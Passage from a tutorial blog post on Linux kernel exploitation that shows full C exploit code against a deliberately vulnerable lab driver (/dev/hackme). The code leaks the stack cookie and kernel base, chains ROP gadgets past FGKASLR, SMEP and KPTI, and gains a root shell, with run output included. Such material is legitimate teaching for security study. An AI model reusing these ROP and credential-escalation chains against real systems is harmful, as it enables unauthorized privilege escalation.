However, we already saw that there is a section at the end of the kernel memory containing read-only data whose addresses are randomized using only ASLR and not KASLR. This section contains the structs __ksymtab_prepare_kernel_cred and __ksymtab_commit_creds whose addresses we could compute. From these, we can compute the addresses of prepare_kernel_cred and commit_cred.

So let us start to access __ksymtab_prepare_kernel_cred and __kstrtab_commit_creds by adding their offsets to the kernel base address. For this, we modified the function leak_cookie() as follows:

void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %ld bytes memory\n", sizeof(leak));
    uint64_t data = read(global_fd, leak, sizeof(leak));
    cookie = leak[16];
    printf("[+] leaked cookie: 0x%lx\n", cookie);
    uint64_t kernel_base = leak[38] - 0x0a157UL;
    printf("[+] leaked kernel_base 0x%lx\n", kernel_base);
    uint64_t ksymtab_prepare_kernel_cred = kernel_base + 0xf8d4fcUL;
    printf("[+] leaked ksymtab_prepare_kernel_cred 0x%lx\n", ksymtab_prepare_kernel_cred);
    uint64_t ksymtab_commit_creds = kernel_base + 0xf87d90UL;
    printf("[+] leaked ksymtab_commit_creds 0x%lx\n", ksymtab_commit_creds);

Running this yields the real addresses of the symbols, as can be shown when contrasting with the true location within /proc/kallsyms.

/ # ./leak_cookie
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie: 0xaec7370351852800
[+] leaked kernel_base 0xffffffffbd600000
[+] leaked ksymtab_prepare_kernel_cred 0xffffffffbe58d4fc
[+] leaked ksymtab_commit_creds 0xffffffffbe587d90
/ # cat /proc/kallsyms | grep ffffffffbe58d4fc
ffffffffbe58d4fc r __ksymtab_prepare_kernel_cred
/ # cat /proc/kallsyms | grep ffffffffbe587d90
ffffffffbe587d90 r __ksymtab_commit_creds

What remains is to compute the location of prepare_kernel_cred from __ksymtab_prepare_kernel_cred and the location of commit_creds from __kstrtab_commit_creds.

Remember that the kernel symbols structs are defined as follows:

struct kernel_symbol {
	  int value_offset;
	  int name_offset;
	  int namespace_offset;
};

Hence, we can now use a ROP gadget to store ksymtabs_commit_creds - 0x10 in rax, read the value_offset, and hence obtain the memory location of commit_creds by adding the value_offset to the location of ksymtabs_commit_creds.

The full code to compute the memory location of commit_creds is as follows.

#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>


char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;
uint64_t cookie = 0;
uint64_t cookie_off = 16;

uint64_t kernel_base;
uint64_t ksymtab_prepare_kernel_cred;
uint64_t ksymtab_commit_creds;

uint64_t pop_rax_ret; // pop rax; ret
uint64_t read_mem_pop1_ret; // mov eax, qword ptr [rax + 0x10]; pop rbp; ret;
uint64_t swapgs_restore_regs_and_return_to_usermode; // The KPTI trampoline

uint64_t tmp;

uint64_t user_cs, user_ss, user_rflags, user_sp;     // for storing the registers


void open_dev(){
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}

void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}

void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %ld bytes memory\n", sizeof(leak));
    uint64_t data = read(global_fd, leak, sizeof(leak));
    cookie = leak[16];
    printf("[+] leaked cookie: 0x%lx\n", cookie);
    uint64_t kernel_base = leak[38] - 0x0a157UL;
    printf("[+] leaked kernel_base 0x%lx\n", kernel_base);
    ksymtab_prepare_kernel_cred = kernel_base + 0xf8d4fcUL;
    printf("[+] leaked ksymtab_prepare_kernel_cred 0x%lx\n", ksymtab_prepare_kernel_cred);
    ksymtab_commit_creds = kernel_base + 0xf87d90UL;
    printf("[+] leaked ksymtab_commit_creds 0x%lx\n", ksymtab_commit_creds);

    pop_rax_ret = kernel_base + 0x4d11UL;
    read_mem_pop1_ret = kernel_base + 0x4aaeUL; // mov eax, qword ptr [rax + 0x10]; pop rbp; ret;
    swapgs_restore_regs_and_return_to_usermode = kernel_base + 0x200f10UL; // the offset from /proc/kallsyms
}

void get_commit_creds(void){
    __asm__(
        ".intel_syntax noprefix;"
        "mov tmp, rax;"
        ".att_syntax;"
    );
    uint64_t commit_creds = ksymtab_commit_creds + (int)tmp;
    printf("[+] leaked commit_creds 0x%lx\n", ksymtab_commit_creds + tmp);
}

void stage1(){
    uint8_t sz = 50;
    uint64_t payload[sz];
    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) pop_rax_ret;
    payload[cookie_off++] = (uint64_t) ksymtab_commit_creds - 0x10;
    payload[cookie_off++] = (uint64_t) read_mem_pop1_ret;
    payload[cookie_off++] = (uint64_t) 0; // dummy pop

    payload[cookie_off++] = (uint64_t) swapgs_restore_regs_and_return_to_usermode + 22; // The KPTI trampoline
    payload[cookie_off++] = (uint64_t) 0; // dummy rax
    payload[cookie_off++] = (uint64_t) 0; // dummy rdi

    payload[cookie_off++] = (uint64_t) get_commit_creds;  // compute the location of commit_creds

    payload[cookie_off++] = (uint64_t) user_cs;
    payload[cookie_off++] = (uint64_t) user_rflags;
    payload[cookie_off++] = (uint64_t) user_sp;
    payload[cookie_off++] = (uint64_t) user_ss;

    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");
}

int main(int argc, char **argv){
    open_dev();
    save_state();
    leak_cookie();
    stage1();
    return 0;
}

Executing this yields the following.

/ # ./leak_commit_creds
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie: 0xbde6cd8832184c00
[+] leaked kernel_base 0xffffffffb3000000
[+] leaked ksymtab_prepare_kernel_cred 0xffffffffb3f8d4fc
[+] leaked ksymtab_commit_creds 0xffffffffb3f87d90
[+] leaked commit_creds 0xb385a200
Segmentation fault

This is the true location of the symbol commit_creds as we can easily verify.

/ # cat /proc/kallsyms | grep b385a200
ffffffffb385a200 T commit_creds

The memory location of prepare_kernel_cred can be retrieved similarly.

Game Plan

After showing these building blocks, we can now stitch together the complete game plan for exploiting the kernel driver with FGKASLR. We can leak enough values of the stack to get the base address of the kernel at offset 38. Then, we can craft a ROP chain with gadgets in the memory area that is only affected by KASLR, but not by FGKASLR. This ROP chain reads the kernel symbol table entries in the read-only data section of kernel memory. The offsets of these entries can again be computed, as they are at a constant offset of the kernel base address and are not affected by FGKASLR, but again only by KASLR. We use these entries to read the address of the functions prepare_kernel_cred and commit_creds. Even though these functions are in the memory area affected by FGKASLR, we can know their addresses, as they are stored in the kernel symbol table.

Then, we need to execute prepare_kernel_cred and commit_creds as before and should be presented with a root shell.

What remains is to circumvent the need for a gadget that moves the result from prepare_kernel_cred to commit_cred, i.e., from rax to rdx. Previously, we had a gadget for this, but it is in the section affected by FGKASLR and hence not available anymore.

Complete Code

We will now present the complete code for the exploit using FGKASLR.

#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>


char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;
uint64_t cookie = 0;

// memory locations in the kernel
uint64_t kernel_base;
uint64_t ksymtab_prepare_kernel_cred;
uint64_t ksymtab_commit_creds;

uint64_t commit_creds;
uint64_t prepare_kernel_cred;

// rop gadgets
uint64_t pop_rax_ret; // pop rax; ret
uint64_t read_mem_pop1_ret; // mov eax, qword ptr [rax + 0x10]; pop rbp; ret;
uint64_t pop_rdi_pop_rbx_ret; // pop rdi ; pop rbx ; ret
uint64_t swapgs_restore_regs_and_return_to_usermode; // The KPTI trampoline

// temporary return values
uint64_t tmp;
uint64_t creds_struct; // returned creds_struct from prepare_kernel_cred(0)

// for storing the registers
uint64_t user_cs, user_ss, user_rflags, user_sp;


void open_dev(){
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}

void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}

/*
First, we leak the cookie and the base address of the kernel.
This allows us to compute the memory locations of the relevant gadgets
in the section that is affected by ASLR, but not by KASLR.
*/
void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %ld bytes memory\n", sizeof(leak));
    uint64_t data = read(global_fd, leak, sizeof(leak));
    cookie = leak[16];
    printf("[+] leaked cookie: 0x%lx\n", cookie);
    kernel_base = leak[38] - 0x0a157UL;
    printf("[+] leaked kernel_base 0x%lx\n", kernel_base);
    ksymtab_prepare_kernel_cred = kernel_base + 0xf8d4fcUL;
    printf("[+] leaked ksymtab_prepare_kernel_cred 0x%lx\n", ksymtab_prepare_kernel_cred);
    ksymtab_commit_creds = kernel_base + 0xf87d90UL;
    printf("[+] leaked ksymtab_commit_creds 0x%lx\n", ksymtab_commit_creds);

    pop_rax_ret = kernel_base + 0x4d11UL;
    pop_rdi_pop_rbx_ret = kernel_base + 0x745dUL;
    read_mem_pop1_ret = kernel_base + 0x4aaeUL; // mov eax, qword ptr [rax + 0x10]; pop rbp; ret;
    swapgs_restore_regs_and_return_to_usermode = kernel_base + 0x200f10UL; // the offset from /proc/kallsyms
}

void stage1();
void stage2();
void stage3();
void stage4();
void get_commit_creds();

/*
The first stage computes the memory location of the symbol commit_creds
*/
void stage1(){
    uint8_t sz = 50;
    uint64_t payload[sz];
    uint64_t cookie_off = 16;

    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) pop_rax_ret;
    payload[cookie_off++] = (uint64_t) ksymtab_commit_creds - 0x10;
    payload[cookie_off++] = (uint64_t) read_mem_pop1_ret;
    payload[cookie_off++] = (uint64_t) 0; // dummy pop

    payload[cookie_off++] = (uint64_t) swapgs_restore_regs_and_return_to_usermode + 22; // The KPTI trampoline
    payload[cookie_off++] = (uint64_t) 0; // dummy rax
    payload[cookie_off++] = (uint64_t) 0; // dummy rdi

    payload[cookie_off++] = (uint64_t) get_commit_creds;  // compute the location of commit_creds

    payload[cookie_off++] = (uint64_t) user_cs;
    payload[cookie_off++] = (uint64_t) user_rflags;
    payload[cookie_off++] = (uint64_t) user_sp;
    payload[cookie_off++] = (uint64_t) user_ss;

    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");
}

void get_commit_creds(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov tmp, rax;"
        ".att_syntax;"
    );
    commit_creds = ksymtab_commit_creds + (int)tmp;
    printf("[+] leaked commit_creds 0x%lx\n", commit_creds);
    stage2();
}

/*
At the end of get_commit_creds, we enter the second stage.
This stage is similar to stage1, but computes the location of the
symbol prepare_kernel_cred.
*/

void  get_prepare_kernel_cred();

void stage2(){
    uint8_t sz = 50;
    uint64_t payload[sz];
    uint64_t cookie_off = 16;

    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) pop_rax_ret;
    payload[cookie_off++] = (uint64_t) ksymtab_prepare_kernel_cred - 0x10;
    payload[cookie_off++] = (uint64_t) read_mem_pop1_ret;
    payload[cookie_off++] = (uint64_t) 0; // dummy pop

    payload[cookie_off++] = (uint64_t) swapgs_restore_regs_and_return_to_usermode + 22; // The KPTI trampoline
    payload[cookie_off++] = (uint64_t) 0; // dummy rax
    payload[cookie_off++] = (uint64_t) 0; // dummy rdi

    payload[cookie_off++] = (uint64_t) get_prepare_kernel_cred;  // compute the location of prepare_kernel_cred

    payload[cookie_off++] = (uint64_t) user_cs;
    payload[cookie_off++] = (uint64_t) user_rflags;
    payload[cookie_off++] = (uint64_t) user_sp;
    payload[cookie_off++] = (uint64_t) user_ss;

    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");
}

void get_prepare_kernel_cred(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov tmp, rax;"
        ".att_syntax;"
    );
    prepare_kernel_cred = ksymtab_prepare_kernel_cred + (int)tmp;
    printf("[+] leaked prepare_kernel_cred 0x%lx\n", prepare_kernel_cred);
    stage3();
}

/*
At the end of get_prepare_kernel_cred, we enter the third stage.
Remember, our ultimate goal is to call commit_creds(prepare_kernel_cred(0)).
The third stage calls prepare_kernel_cred(0). Per calling convention,
the argument needs to be loaded in rdi. Fortunately we have a gadget
for that.
*/

void return_prepare_kernel_cred();

void stage3(){
    uint8_t sz = 50;
    uint64_t payload[sz];
    uint64_t cookie_off = 16;

    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) pop_rdi_pop_rbx_ret;
    payload[cookie_off++] = (uint64_t) 0; // RDI, initialize argument for prepare_kernel_cred
    payload[cookie_off++] = (uint64_t) 0; // RBX

    payload[cookie_off++] = (uint64_t) prepare_kernel_cred; // prepare_kernel_cred(0)

    payload[cookie_off++] = (uint64_t) swapgs_restore_regs_and_return_to_usermode + 22; // The KPTI trampoline
    payload[cookie_off++] = (uint64_t) 0; // dummy rax
    payload[cookie_off++] = (uint64_t) 0; // dummy rdi

    payload[cookie_off++] = (uint64_t) return_prepare_kernel_cred;  // return after prepare_kernel_cred(0)

    payload[cookie_off++] = (uint64_t) user_cs;
    payload[cookie_off++] = (uint64_t) user_rflags;
    payload[cookie_off++] = (uint64_t) user_sp;
    payload[cookie_off++] = (uint64_t) user_ss;

    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");

}

void return_prepare_kernel_cred(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov tmp, rax;"
        ".att_syntax;"
    );
    creds_struct = tmp;
    printf("[+] returned creds_struct 0x%lx\n", creds_struct);
    stage4();
}

/*
Stage4 executes commit_creds on the returned creds struct of stage3.
After that, we jump to a shell.
*/

void shell();

void stage4(){
    uint8_t sz = 50;
    uint64_t payload[sz];
    uint64_t cookie_off = 16;

    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) pop_rdi_pop_rbx_ret;
    payload[cookie_off++] = (uint64_t) creds_struct; // RDI, argument for commit_creds
    payload[cookie_off++] = (uint64_t) 0; // RBX

    payload[cookie_off++] = (uint64_t) commit_creds; // commit_creds(prepare_kernel_cred(0))

    payload[cookie_off++] = (uint64_t) swapgs_restore_regs_and_return_to_usermode + 22; // The KPTI trampoline
    payload[cookie_off++] = (uint64_t) 0; // dummy rax
    payload[cookie_off++] = (uint64_t) 0; // dummy rdi

    payload[cookie_off++] = (uint64_t) shell;  // return after we have elevated permissions

    payload[cookie_off++] = (uint64_t) user_cs;
    payload[cookie_off++] = (uint64_t) user_rflags;
    payload[cookie_off++] = (uint64_t) user_sp;
    payload[cookie_off++] = (uint64_t) user_ss;

    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");

}

void shell(){
    uid_t uid = getuid();
    if (uid == 0) {
        printf("[+] we are root (uid = %d)\n", uid);
    } else {
        printf("[!] we are not root (uid: %d)\n", uid);
        exit(-1);
    }
    execl("/bin/sh", "sh", NULL);
    exit(0);
}


int main(int argc, char **argv){
    open_dev();
    save_state();
    leak_cookie();
    stage1();
    return 0;
}

Executing the code looks as follows.

/ $ id
uid=1000 gid=1000 groups=1000
/ # ./exploit_fgkaslr
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie: 0xc2f94f03356f4600
[+] leaked kernel_base 0xffffffff86e00000
[+] leaked ksymtab_prepare_kernel_cred 0xffffffff87d8d4fc
[+] leaked ksymtab_commit_creds 0xffffffff87d87d90
[+] leaked commit_creds 0xffffffff874ef630
[+] leaked prepare_kernel_cred 0xffffffff8791bd70
[+] returned creds_struct 0xffff93cd472e1780
[+] we are root (uid = 0)

Conclusion/Summary

That was a long article. Congrats if you made it this far. If you skipped some parts, or forgot the start of the article, here are the most important points, that should stick with you.

In general, in kernel space you cannot pop shellcode. You want to execute commit_creds(prepare_kernel_cred(0)) and return back to user space. This gives you an elevated prompt.

If you encounter SMEP (Supervisor Mode Execution Prevention) or SMAP (Supervisor Mode Access Prevention) you cannot use code from user space in kernel exploits. What you need to do to bypass it, is to write a ROP chain with gadgets in the kernel.

If you encounter KPTI (Kernel Page Table Isolation) there are various bypasses. The most common one is to make use of a KPTI trampoline. This is the code that syscalls execute when they go back to user space. You can find the other bypasses above in the article.

Finally, if you encounter Kernel ASLR (Address Space Layout Randomization) you need to check if it is on the granularity of functions or if the whole kernel is moved by an offset. In the second case, a single kernel address leak is enough to recover all addresses. If FGKASLR is used, there are still parts of the kernel that are only moved by a static offset. Again using a kernel address leak allows to construct ROP chains using these memory locations

Resources

There are lots of writeups for exactly this challenge and i have read multiple of them, as they focus on different aspects. Some code parts are lifted from these other writeups. Without these writeups my guide could not have existed. We really stand on the shoulders of giants.

← Previous Archive Next →

Published

17 December 2024

Introduction To Linux Kernel Exploitation Exploiting Buffer Overflows in Vulnerable Kernel Modules

Prelude

Setup

vmlinuz

initramfs.cpio.gz

run.sh

Kernel Security Mitigations

Reconnaissance

Leaking the Stack

Controlling RIP

Privilege Escalation Without Any Mitigations: Ret2Usr

Adding SMEP/SMAP

Alternative way of bypassing SMEP but not SMAP

Adding KPTI

KPTI Bypass 1: Using a Signal Handler

KPTI Bypass 2: KPTI Trampolines

KPTI Bypass 3: Abuse Modprobe

Adding KASLR

Preliminaries

Reconnaissance

Investigating the Stack

Comparing Addresses of Kernel Symbols

Leaking the Addresses of `prepare_kernel_cred` and `commit_cred`

Game Plan

Complete Code

Conclusion/Summary

Resources

Published

Category

Tags

Introduction To Linux Kernel Exploitation Exploiting Buffer Overflows in Vulnerable Kernel Modules

Prelude

Setup

vmlinuz

initramfs.cpio.gz

run.sh

Kernel Security Mitigations

Reconnaissance

Leaking the Stack

Controlling RIP

Privilege Escalation Without Any Mitigations: Ret2Usr

Adding SMEP/SMAP

Alternative way of bypassing SMEP but not SMAP

Adding KPTI

KPTI Bypass 1: Using a Signal Handler

KPTI Bypass 2: KPTI Trampolines

KPTI Bypass 3: Abuse Modprobe

Adding KASLR

Preliminaries

Reconnaissance

Investigating the Stack

Comparing Addresses of Kernel Symbols

Leaking the Addresses of prepare_kernel_cred and commit_cred

Game Plan

Complete Code

Conclusion/Summary

Resources

Published

Category

Tags

Leaking the Addresses of `prepare_kernel_cred` and `commit_cred`